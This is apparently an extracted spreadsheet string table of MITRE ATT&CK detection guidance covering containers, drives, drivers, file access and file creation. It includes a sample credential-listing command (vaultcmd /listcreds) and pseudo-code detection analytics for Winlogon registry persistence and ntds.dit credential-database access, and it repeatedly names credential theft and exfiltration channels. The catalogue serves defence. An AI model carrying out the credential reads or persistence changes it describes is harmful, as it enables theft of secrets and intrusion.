    <t>attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62</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</si>
  <si>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</si>
  <si>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relationship--8dfa76a0-f72a-4db0-b0a8-7a8924e1f40f</t>
  </si>
  <si>
    <t>attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for suspicious activity listing credentials from the Windows Credentials locker (e.g. &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>relationship--46a35d96-f926-4086-b394-324ef88bdb21</t>
  </si>
  <si>
    <t>Monitor for executed commands and arguments for PowerShell cmdlets that can be used to retrieve or modify file and directory DACLs.</t>
  </si>
  <si>
    <t>relationship--3667c499-ca5d-48fe-9729-44876c176dc2</t>
  </si>
  <si>
    <t>attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are used to perform remote behavior</t>
  </si>
  <si>
    <t>relationship--edfa094b-72a6-4d21-a409-66b86d07ef4b</t>
  </si>
  <si>
    <t>attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent)</t>
  </si>
  <si>
    <t>relationship--db518d43-10d3-4c9b-bd69-3b8d06246d23</t>
  </si>
  <si>
    <t>attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may invoke a WinRM script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>relationship--afc9aebc-e3db-4d83-b36f-0960a6ad6b66</t>
  </si>
  <si>
    <t>attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32</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</si>
  <si>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</si>
  <si>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relationship--854edd76-3754-46fb-978e-74c1bb460bf2</t>
  </si>
  <si>
    <t>attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
&lt;h4&gt;Analytic 1 - Modification of the Winlogon Registry Key&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (event_id == "1" OR event_id == "4688") 
  AND
  (ProcessCommandLine LIKE '%Microsoft\Windows NT\CurrentVersion\Winlogon%' AND
     (ProcessCommandLine LIKE '%Userinit%' OR ProcessCommandLine LIKE '%Shell%' OR ProcessCommandLine LIKE '%Notify%'))
  AND
  (ProcessCommandLine LIKE '%reg%' OR ProcessCommandLine LIKE '%add%' OR ProcessCommandLine LIKE '%/d%' OR
   ProcessCommandLine LIKE '%Set-ItemProperty%' OR ProcessCommandLine LIKE '%New-ItemProperty%' ProcessCommandLine LIKE '%-value%')&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--16e277dc-a879-4eae-bb7e-cb7165e6666f</t>
  </si>
  <si>
    <t>attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may modify XDG autostart entries to execute programs or commands during system boot.</t>
  </si>
  <si>
    <t>relationship--76c3b96b-143e-4c02-9f2e-23647a5a77b9</t>
  </si>
  <si>
    <t>Container Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953</t>
  </si>
  <si>
    <t>attack-pattern--1126cab1-c700-412f-a510-61f4937bb096</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers</t>
  </si>
  <si>
    <t>relationship--39b38754-4a37-4665-acb7-6645a08e9ad2</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t>relationship--ade90c6d-38cd-4d04-9883-489b8de6f40a</t>
  </si>
  <si>
    <t>attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. </t>
  </si>
  <si>
    <t>relationship--41cbc2d5-a360-4c1c-85b1-32459b05ae08</t>
  </si>
  <si>
    <t>Track the deployment of new containers, especially from newly built images.</t>
  </si>
  <si>
    <t>relationship--a18968c2-e639-40fa-9751-1a5ab666bfde</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>relationship--beeaf89d-cbd4-49fd-a18a-a430e3ad8c36</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--97ed3a58-55a7-4dad-bf63-e2f535bec6d0</t>
  </si>
  <si>
    <t>Container Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8</t>
  </si>
  <si>
    <t>attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336</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</si>
  <si>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</si>
  <si>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relationship--c5892089-9b2f-4cb4-89a9-16794d0945b2</t>
  </si>
  <si>
    <t>Container Start</t>
  </si>
  <si>
    <t>x-mitre-data-component--5fe82895-28e5-4aac-845e-dc886b63be2e</t>
  </si>
  <si>
    <t>Monitor for activation or invocation of a container that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t>relationship--61a6e958-5a07-41d3-9b93-be619febcaad</t>
  </si>
  <si>
    <t>Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.</t>
  </si>
  <si>
    <t>relationship--9ce4b00d-fa78-4c17-9b96-b36bb9117a4a</t>
  </si>
  <si>
    <t>Monitor for the activation or invocation of a container (ex: docker start or docker restart)</t>
  </si>
  <si>
    <t>relationship--f0963c9d-076b-41a5-8034-a10f3cbaf657</t>
  </si>
  <si>
    <t>Domain Registration</t>
  </si>
  <si>
    <t>x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>relationship--ea715657-58c0-4f43-8959-e9d265032303</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</si>
  <si>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</si>
  <si>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relationship--329a2563-fc1b-4828-a6b7-d11d1d4ad429</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</si>
  <si>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</si>
  <si>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relationship--ae04e50b-74cc-472f-9bab-ffd2a60aa822</t>
  </si>
  <si>
    <t>relationship--4988b61b-6496-4a74-9d91-e1d3b352f5ef</t>
  </si>
  <si>
    <t>Drive Access</t>
  </si>
  <si>
    <t>x-mitre-data-component--73ff2dcc-24b1-4368-b9dc-706dd9e68354</t>
  </si>
  <si>
    <t>attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef</t>
  </si>
  <si>
    <t>Monitor for unexpected file access on removable media</t>
  </si>
  <si>
    <t>relationship--ee146f0e-a4ce-41fd-aea2-4e7b82e047eb</t>
  </si>
  <si>
    <t>Monitor handle opens on volumes that are made by processes to determine when they may be directly collecting data from logical drives. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>relationship--e5e4eabe-7212-4404-b46a-8ed761a05d29</t>
  </si>
  <si>
    <t>07 April 2022</t>
  </si>
  <si>
    <t>Monitor for newly constructed drive letters or mount points to a data storage device for attempts to write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.</t>
  </si>
  <si>
    <t>relationship--ac6fad74-ba50-45fd-9de0-e943c2297fe0</t>
  </si>
  <si>
    <t>relationship--aa9de902-8eb4-41b0-8b6a-b26469c78b27</t>
  </si>
  <si>
    <t>relationship--6e855990-62ed-4a9f-ad96-be4b50855492</t>
  </si>
  <si>
    <t>Drive Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes when removable media is mounted. </t>
  </si>
  <si>
    <t>relationship--23a1a83e-6b32-43df-9aa4-dad2bcb25e61</t>
  </si>
  <si>
    <t>Monitor for newly assigned drive letters or mount points to a data storage device that may attempt to exfiltrate data via a physical medium, such as a removable drive.</t>
  </si>
  <si>
    <t>relationship--79c427b2-05c5-4e55-9626-b5709b2afd9a</t>
  </si>
  <si>
    <t>Monitor for newly assigned drive letters or mount points to a data storage device that may attempt to exfiltrate data over a USB connected physical device.</t>
  </si>
  <si>
    <t>relationship--8ea1a0e5-bef3-4c67-ac85-e64675e33829</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</si>
  <si>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</si>
  <si>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relationship--8c9b8162-58e3-4e3c-ad07-afd9baf742f5</t>
  </si>
  <si>
    <t>attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4</t>
  </si>
  <si>
    <t>Monitor for newly constructed drive letters or mount points to removable media</t>
  </si>
  <si>
    <t>relationship--c31d35a1-79b9-41de-8a69-7593ae410ec4</t>
  </si>
  <si>
    <t>Drive Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08</t>
  </si>
  <si>
    <t>attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba</t>
  </si>
  <si>
    <t>Monitor for changes to MBR and VBR as they occur for indicators for suspicious activity and further analysis. Take snapshots of MBR and VBR and compare against known good samples.</t>
  </si>
  <si>
    <t>relationship--249d3c25-f482-488f-abc8-671d2af3aac7</t>
  </si>
  <si>
    <t>Monitor for changes made to drive letters or mount points of data storage devices for attempts to read to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.</t>
  </si>
  <si>
    <t>relationship--7e80cb17-5630-4ff3-bfea-5c5f3a408c5d</t>
  </si>
  <si>
    <t>relationship--40be108e-f0a9-4908-8bc8-591bb7a245ae</t>
  </si>
  <si>
    <t>relationship--903df321-425b-4eb6-9ce3-fcc53dc5af2b</t>
  </si>
  <si>
    <t>relationship--3c7ac9c1-0d30-4207-b3ec-79d53f7155d3</t>
  </si>
  <si>
    <t>attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b</t>
  </si>
  <si>
    <t>Monitor for changes made to drive letters or mount points of data storage devices for unexpected modifications that may be used by rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.</t>
  </si>
  <si>
    <t>relationship--0724c72a-61b3-49e9-908a-28b8177f6657</t>
  </si>
  <si>
    <t>Driver Load</t>
  </si>
  <si>
    <t>x-mitre-data-component--3551476e-14f5-4e48-a518-e82135329e03</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>relationship--ce9f2e68-fbf0-4668-8ec6-89fefd10da7b</t>
  </si>
  <si>
    <t>Monitor for new service driver installations and loads (ex: Sysmon Event ID 6) that are not part of known software update/patch cycles.</t>
  </si>
  <si>
    <t>relationship--1b8e07df-204a-4742-b34c-40108fb5c3c8</t>
  </si>
  <si>
    <t>Monitor for unusual/suspicious driver activity, especially regarding EDR and drivers associated with security tools as well as those that may be abused to disable security products.</t>
  </si>
  <si>
    <t>relationship--e916a806-da3c-4eed-9b25-6ba47a12957f</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>relationship--bb28e9c0-3d03-4f7b-937f-d0398d8dd59b</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</si>
  <si>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</si>
  <si>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relationship--34f6cedf-df54-43bf-b481-2078bec94b99</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity that may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>relationship--059c285c-c836-400a-ad47-35148404c8a4</t>
  </si>
  <si>
    <t>attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839</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</si>
  <si>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</si>
  <si>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relationship--81dc6d45-2afe-4646-ad04-cc40ca768f2c</t>
  </si>
  <si>
    <t>relationship--f94b51bf-5b45-4560-9a14-b755562d3d39</t>
  </si>
  <si>
    <t>attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unusual kernel driver installation activity </t>
  </si>
  <si>
    <t>relationship--e590c381-4589-4f02-9da4-7b9743f0da4e</t>
  </si>
  <si>
    <t>attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4</t>
  </si>
  <si>
    <t>relationship--29f12e79-a73e-4660-aefd-40dee902fefa</t>
  </si>
  <si>
    <t>attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4</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</si>
  <si>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</si>
  <si>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relationship--a2e156c1-c54b-4a60-8016-9383e1a31848</t>
  </si>
  <si>
    <t>attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49</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</si>
  <si>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</si>
  <si>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relationship--874c3f4d-2b9f-414f-9252-b82a7b600986</t>
  </si>
  <si>
    <t>attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.</t>
  </si>
  <si>
    <t>relationship--c8c81782-26cb-4dcc-abc0-9d964d83031c</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</si>
  <si>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</si>
  <si>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relationship--dbf14695-c904-493b-ae94-51d856a3106a</t>
  </si>
  <si>
    <t>Driver Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79</t>
  </si>
  <si>
    <t>attack-pattern--791481f8-e96a-41be-b089-a088763083d4</t>
  </si>
  <si>
    <t>Monitor for unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation</t>
  </si>
  <si>
    <t>relationship--faac14e9-09c0-4b67-9f33-cd5194af8180</t>
  </si>
  <si>
    <t>Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation</t>
  </si>
  <si>
    <t>relationship--bdda772c-0497-4d4a-9a18-29e5d848b276</t>
  </si>
  <si>
    <t>File Access</t>
  </si>
  <si>
    <t>x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71</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</si>
  <si>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</si>
  <si>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relationship--7a00e481-ffd9-4f9b-8668-662cbd5c0628</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</si>
  <si>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</si>
  <si>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relationship--d7a5af2e-669a-4e52-b29a-579320118b91</t>
  </si>
  <si>
    <t>Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data.</t>
  </si>
  <si>
    <t>relationship--cfcd06e3-36a3-4c83-b6a5-4dcdd4b4668e</t>
  </si>
  <si>
    <t>25 July 2022</t>
  </si>
  <si>
    <t>Monitor for abnormal access to files (i.e. .pdf, .docx, .jpg, etc.), especially sensitive documents, through the use of automated processing after being gathered during Collection.</t>
  </si>
  <si>
    <t>relationship--2d4f68c1-6c89-4216-999e-75d68cfb9fa1</t>
  </si>
  <si>
    <t>12 April 2022</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity.</t>
  </si>
  <si>
    <t>relationship--1a2525a3-6e34-444b-b055-67d21f14e697</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</si>
  <si>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</si>
  <si>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relationship--b586d488-bcc0-45bd-b44f-587ddc5f2c7a</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</si>
  <si>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</si>
  <si>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relationship--f919b3aa-87dc-49f0-9fd0-676ed49d0d60</t>
  </si>
  <si>
    <t>Monitor for files being accessed that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>relationship--9dd6f39e-72c6-4846-acdd-6786843b5dfb</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</si>
  <si>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</si>
  <si>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relationship--51199d93-66da-4b43-90b5-fdddb823b9c9</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</si>
  <si>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</si>
  <si>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relationship--0f7dd23d-4f83-4db4-99cd-71556f3bb2c6</t>
  </si>
  <si>
    <t>Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (pdf, .docx, .jpg, etc.) or local databases.</t>
  </si>
  <si>
    <t>relationship--f4bc052c-7119-4f7a-86b0-2ee69ad1d33c</t>
  </si>
  <si>
    <t>Monitor for unexpected files (i.e. .pdf, .docx, .jpg, etc.)  interacting with network shares.</t>
  </si>
  <si>
    <t>relationship--d04f953e-d7f6-4581-860b-2ff5378a636d</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected/abnormal file accesses to removable media (optical disk drive, USB memory, etc.) connected to the compromised system. </t>
  </si>
  <si>
    <t>relationship--5e338cdf-8cf7-4d67-945e-850b7dbd33d9</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</si>
  <si>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</si>
  <si>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relationship--a8241c03-c375-459e-b47a-f03b3c4af29a</t>
  </si>
  <si>
    <t>Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>relationship--b4b94cc9-01f1-4408-96b0-4ad9d0e3b80d</t>
  </si>
  <si>
    <t>Monitor files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>relationship--cb7c7b64-cad4-474d-b8af-9cd8a73ae47e</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</si>
  <si>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</si>
  <si>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relationship--28abd456-dafd-495a-8ea1-13ee20bcea7c</t>
  </si>
  <si>
    <t>10 April 2022</t>
  </si>
  <si>
    <t>Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.</t>
  </si>
  <si>
    <t>relationship--507142c0-2cb1-4e3e-bf27-9514694a7d91</t>
  </si>
  <si>
    <t>Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection.</t>
  </si>
  <si>
    <t>relationship--e573b5f1-a3e4-40d3-bd1b-8eecc0b57045</t>
  </si>
  <si>
    <t>Monitor file access on removable media that may attempt to exfiltrate data via a physical medium, such as a removable drive.</t>
  </si>
  <si>
    <t>relationship--4a09dc02-3ca0-4429-8afa-02362e18f76d</t>
  </si>
  <si>
    <t>Monitor for files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>relationship--68dc04ee-ef1f-4ed4-a3eb-3232394543c3</t>
  </si>
  <si>
    <t>relationship--3ab45417-a7b7-4843-b70a-864f3cfe98d7</t>
  </si>
  <si>
    <t>Monitor for files being accessed by an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--9e56fced-affc-466a-96bf-6e9aa2670257</t>
  </si>
  <si>
    <t>Monitor for files being accessed to exfiltrate data to a webhook as a malicious command and control channel.</t>
  </si>
  <si>
    <t>relationship--f8e3f60b-4a73-427e-85c6-cc58e1089791</t>
  </si>
  <si>
    <t>Monitor file access on removable media that may attempt to exfiltrate data over a USB connected physical device.</t>
  </si>
  <si>
    <t>relationship--b9ea9e15-a460-4957-988b-4a9af00619bd</t>
  </si>
  <si>
    <t>Monitor for files being accessed to exfiltrate data to a cloud storage service rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--a649c784-c4f5-4892-be23-b6cb745ce60a</t>
  </si>
  <si>
    <t>Monitor for files being accessed to exfiltrate data to a code repository rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>relationship--e902bcf6-4456-410a-a765-1cebc08d2f65</t>
  </si>
  <si>
    <t>attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2</t>
  </si>
  <si>
    <t>Monitor for unexpected files used to gather credentials when the files are rendered</t>
  </si>
  <si>
    <t>relationship--2568247e-c8f6-4f6f-ae88-9dc4430df290</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files.</t>
  </si>
  <si>
    <t>relationship--00a4a29f-bbc3-45aa-82ad-7adb0c67a7db</t>
  </si>
  <si>
    <t>Monitor for Keychain files being accessed that may be related to malicious credential collection.</t>
  </si>
  <si>
    <t>relationship--c94231d2-5b79-457d-b41c-4a496c173b68</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</si>
  <si>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</si>
  <si>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relationship--ee32984e-152b-4792-a722-4150418851f1</t>
  </si>
  <si>
    <t>relationship--65353c62-ae7d-4a5b-9151-16bbbcccadb6</t>
  </si>
  <si>
    <t>Monitor for unusual processes accessing local email files that may target user email on local systems to collect sensitive information.</t>
  </si>
  <si>
    <t>relationship--09b26cdc-a947-4ae5-a642-8e0f7c8b5ca5</t>
  </si>
  <si>
    <t>Monitor for access to system and service log files, especially from unexpected and abnormal users.</t>
  </si>
  <si>
    <t>relationship--6bf29e21-1e2a-46fe-89cd-ca5dc863dd0c</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</si>
  <si>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&lt;h4&gt; Analytic 1 &lt;/h4&gt;
&lt;code&gt;suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND 
(object_type = "File") AND
(file_name = "*ntds.dit*") AND
(access_list = "*%%4416*" OR access_list = "*%%4419*" OR access_list = "*%%4416*")&lt;/code&gt;
&lt;h4&gt; Analytic 2 &lt;/h4&gt;
&lt;code&gt;suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND 
(object_type = "File") AND
(file_name = "*ntds.dit*") AND
(access_list = "*%%4417*" OR access_list = "*%%4424*")&lt;/code&gt;
&lt;h4&gt; Analytic 3&lt;/h4&gt;
&lt;code&gt;suspicious_file = filter file_access where ((event_id = "11") AND (file_name = "*.dit") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--6932915f-7164-4cef-87bd-51063c1819e7</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</si>
  <si>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</si>
  <si>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relationship--cfba6051-3ed3-49f6-96de-d6af053dce81</t>
  </si>
  <si>
    <t>Monitor file reads that may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019)</t>
  </si>
  <si>
    <t>relationship--497ab7d8-df5c-4b51-8a8b-1d632a0536e5</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. </t>
  </si>
  <si>
    <t>relationship--d0b54471-3dd1-4c4a-aad6-4ae089523198</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</si>
  <si>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</si>
  <si>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relationship--7765bb01-3f20-47f8-a871-ad334e927af2</t>
  </si>
  <si>
    <t>relationship--bf0c68c0-c1cd-41d2-942f-0bb3e303ac08</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</si>
  <si>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</si>
  <si>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relationship--5514c844-4f4b-4a07-a98b-60715a1c587f</t>
  </si>
  <si>
    <t>Monitor for unexpected files accessed on removable media.</t>
  </si>
  <si>
    <t>relationship--48b51416-fe40-45ba-8bab-5f5a6ef3b35d</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</si>
  <si>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</si>
  <si>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relationship--757b38be-e836-40f3-9432-2a01441675e2</t>
  </si>
  <si>
    <t>attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials to cloud service management consoles. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.</t>
  </si>
  <si>
    <t>relationship--a6270ac3-f99b-452d-a5f9-abb86159415c</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</si>
  <si>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</si>
  <si>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relationship--e6b6a34f-f444-42b0-9f33-3557c1deb5a7</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</si>
  <si>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</si>
  <si>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relationship--d552463d-b74b-440c-a936-979e8615a844</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</si>
  <si>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</si>
  <si>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relationship--cd6b15c6-65d0-4791-9cf5-bff9066f1060</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</si>
  <si>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</si>
  <si>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relationship--e06dcec4-ccdb-4d49-a98c-62a6b0ba14ad</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</si>
  <si>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</si>
  <si>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relationship--18d99703-bb5c-4d69-86c5-bff909730bc0</t>
  </si>
  <si>
    <t>20 May 2022</t>
  </si>
  <si>
    <t>File Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.</t>
  </si>
  <si>
    <t>relationship--7a406ef1-45bd-43c6-9c6d-b72ae161f36d</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--fcd1bb08-22c4-4de4-b49e-de945a67cf6b</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</si>
  <si>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</si>
  <si>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relationship--ea8d3877-97d1-4dbb-b820-ac978dfd20c0</t>
  </si>
  <si>
    <t>attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b</t>
  </si>
  <si>
    <t>relationship--8237d55d-49c6-4c4c-bdf6-fd35580e1ee5</t>
  </si>
  <si>
    <t>attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6</t>
  </si>
  <si>
    <t>relationship--1a127132-e2a1-45af-a976-0fb35f08e614</t>
  </si>
  <si>
    <t>relationship--d640a79e-1c7a-4672-8a0d-1b8248e510d1</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>relationship--3b14b6f4-f1c4-4d60-9406-5f1fa45daf11</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may use scripts automatically executed at boot or logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>relationship--c4679389-6780-4ae0-9a04-721b3dbfbb11</t>
  </si>
  <si>
    <t>Monitor for newly constructed files and/or all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions</t>
  </si>
  <si>
    <t>relationship--eba8bfe5-1005-4e0e-91d3-f116c6d2380a</t>
  </si>
  <si>
    <t>Monitor for newly constructed files for payloads</t>
  </si>
  <si>
    <t>relationship--4226f765-6193-4dba-b568-2fe751cedaf0</t>
  </si>
  <si>
    <t>Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>relationship--5ef60fca-8b7c-40e4-a148-5f6d46e96781</t>
  </si>
  <si>
    <t>attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may modify client software binaries to establish persistent access to systems.</t>
  </si>
  <si>
    <t>relationship--fb152ce0-5c2f-435b-87cb-5f685f3116ac</t>
  </si>
  <si>
    <t>Monitor for newly constructed files by using the logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments.</t>
  </si>
  <si>
    <t>relationship--0337dbde-bc25-47ec-936c-19624d3f0df3</t>
  </si>
  <si>
    <t>attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c</t>
  </si>
  <si>
    <t>Monitor for unexpected and abnormal file creations that may indicate malicious content injected through online network communications.</t>
  </si>
  <si>
    <t>relationship--a2922277-e582-4baf-8c74-568964d17d2a</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may forge web cookies that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
    <t>relationship--1266285f-01b9-4682-85ae-bfa9750100c5</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--acb573cf-9f4b-47ff-b0c7-8679773f3fef</t>
  </si>
  <si>
    <t>attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34</t>
  </si>
  <si>
    <t>Monitor newly constructed .manifest and .local redirection files that do not correlate with software updates.</t>
  </si>
  <si>
    <t>relationship--ce0ff9c3-1e41-4103-8e2d-985d6993d08a</t>
  </si>
  <si>
    <t>attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b</t>
  </si>
  <si>
    <t>Monitor for newly constructed files in common folders on the computer system.</t>
  </si>
  <si>
    <t>relationship--e1d10988-f976-4856-a8bd-e85d5d6af2dc</t>
  </si>
  <si>
    <t>Monitor for newly constructed files in user directories.</t>
  </si>
  <si>
    <t>relationship--97c1a236-cc9d-4433-9fe8-382a8c03196a</t>
  </si>
  <si>
    <t>attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931</t>
  </si>
  <si>
    <t>Monitor for newly constructed files in order to manipulate external outcomes or hide activity</t>
  </si>
  <si>
    <t>relationship--9212fc97-5ddd-4bec-a63b-892164dcb03f</t>
  </si>
  <si>
    <t>Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.</t>
  </si>
  <si>
    <t>relationship--86eff809-54ad-47e1-aacf-24c439a21aa5</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed visual content for internal or external enterprise networks. </t>
  </si>
  <si>
    <t>relationship--339d3a92-467e-4614-9714-7f101f113179</t>
  </si>
  <si>
    <t>Monitor for the creation of volume shadow copy and backup files, especially unexpected and irregular activity (relative to time, user, etc.).</t>
  </si>
  <si>
    <t>relationship--55b619f6-daf8-4126-99b9-65db277da82c</t>
  </si>
  <si>
    <t>attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e</t>
  </si>
  <si>
    <t>Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.</t>
  </si>
  <si>
    <t>relationship--28614524-0392-46fd-b9b9-d24dec6cadd2</t>
  </si>
  <si>
    <t>Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.</t>
  </si>
  <si>
    <t>relationship--d2b0a7e2-6822-4583-985c-f3c58c93ebad</t>
  </si>
  <si>
    <t>attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490</t>
  </si>
  <si>
    <t>Monitor for newly constructed dylibs</t>
  </si>
  <si>
    <t>relationship--9c993360-3ad2-46f7-8866-060c99eeddc8</t>
  </si>
  <si>
